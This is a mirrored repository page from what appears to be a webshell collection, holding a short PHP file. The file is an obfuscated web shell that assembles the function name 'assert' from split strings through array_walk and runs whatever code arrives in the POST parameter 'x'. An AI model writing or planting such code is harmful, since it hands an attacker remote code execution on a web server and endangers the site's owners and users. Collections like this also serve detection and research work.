mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
10 lines
165 B
PHP
10 lines
165 B
PHP
<?php
|
|
function sqlsec($value,$key)
|
|
{
|
|
$x = $key.$value;
|
|
$x($_POST['x']);
|
|
}
|
|
$a=array("ass"=>"ert");
|
|
array_walk($a,"sqlsec");
|
|
?>
|